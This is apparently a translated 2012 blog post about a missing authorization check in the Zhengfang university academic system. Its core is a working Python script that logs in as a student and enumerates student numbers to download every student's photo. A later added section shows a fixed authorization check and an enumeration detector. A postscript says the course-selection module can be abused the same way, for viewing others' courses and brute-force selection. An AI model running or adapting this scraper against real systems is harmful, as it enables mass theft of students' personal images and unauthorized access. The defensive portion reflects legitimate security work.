One vulnerability in the Zhengfang (正方) academic system is that it performs no identity check when serving a student's photo. In theory, to fetch Li Si's photo the system should first determine whether the logged-in user is a teacher or a student, and if a student, whether that user is Li Si himself. The Zhengfang system does not do this well, so Zhang San can easily obtain Li Si's photo.
Below is a simple crawler the author wrote; the Python code follows (Python 3.2):
```python
import http.client
import urllib.parse   # 'import urllib' alone does not provide urllib.parse.urlencode
import os

_xh = '**********'   # student number used to log in
_pw = '**********'   # password
VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'
print(main_url)
print(login_url)

conn = http.client.HTTPConnection(host)

# Form fields of the ASP.NET login page
login_post_data = urllib.parse.urlencode({
    '__VIEWSTATE': VIEWSTATE,
    'TextBox1': _xh,
    'TextBox2': _pw,
    'RadioButtonList1': '学生',
    'Button1': '',
    'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')
login_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'Origin': main_url,
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': main_url,
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}
conn.request('POST', login_page, body=login_post_data, headers=login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
# Keep only the name=value part of the Set-Cookie header as the session cookie
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()

readimage_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    'Cookie': cookie
}
conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers=readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()

# The student number is year, college, major, class and serial number, two digits each
os.makedirs('./pic/', exist_ok=True)  # output directory must exist before open() below
for year in range(1, 12):  # 11
    for college in range(1, 20):  # 19
        for major in range(1, 15):  # 14
            for mclass in range(1, 10):
                for series in range(1, 50):
                    image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
                    readimage_url = readimage_page + '?' + 'xh=' + image_xh
                    print(readimage_url)
                    conn.request('GET', readimage_url, headers=readimage_headers)
                    result = conn.getresponse()
                    #print(result.status)
                    image = result.read()
                    # Anything larger than 1 KB is treated as a real photo
                    if len(image) > 1024:
                        save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
                        print(save_path)
                        fp = open(save_path, 'wb')
                        fp.write(image)
                        fp.close()
                    else:
                        print('skip')
print('done')
conn.close()
```
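The authorization rule the first paragraph says is missing, as an added example that is not part of the original post and not Zhengfang's code: the handler behaviour the post describes beside a hardened one, plus a simple detector for the sequential-xh access pattern the crawler above produces. The Session class, the in-memory photo store and the threshold are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    # Identity established by the login POST, never taken from the ?xh= query string.
    user_id: str   # student number (xh) or a teacher id
    role: str      # "teacher" or "student"


# Constructed sample photo store keyed by xh; stands in for the backend behind readimagexs.aspx.
PHOTOS = {
    "0101010101": b"\x00" * 2048,  # Zhang San (constructed)
    "0101010102": b"\x01" * 2048,  # Li Si (constructed)
}


def read_image_vulnerable(session, xh):
    # The behaviour the post describes: being logged in at all is enough to fetch any xh.
    if session is None:
        raise PermissionError("login required")
    return PHOTOS.get(xh)


def may_view_photo(session, xh):
    # The missing rule: a teacher may view any student; a student only his own record.
    if session is None:
        return False
    if session.role == "teacher":
        return True
    return session.role == "student" and session.user_id == xh


def read_image_fixed(session, xh):
    if not may_view_photo(session, xh):
        raise PermissionError("session may not view xh=%s" % xh)
    return PHOTOS.get(xh)


# Detection side: the crawler walks xh values in order, so one session touching many
# distinct xh is the signal to alert on. The threshold is an assumed value.
ENUM_THRESHOLD = 20
_distinct_xh = defaultdict(set)


def observe_request(session, xh):
    """Record the xh requested by this session; return True once it looks like enumeration."""
    _distinct_xh[session.user_id].add(xh)
    return len(_distinct_xh[session.user_id]) > ENUM_THRESHOLD
```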
Postscript: the Zhengfang course-selection module still has the same kind of vulnerability, so in theory peeking at other people's courses and brute-force course selection can likewise be carried out.
2012-07-01
By whypro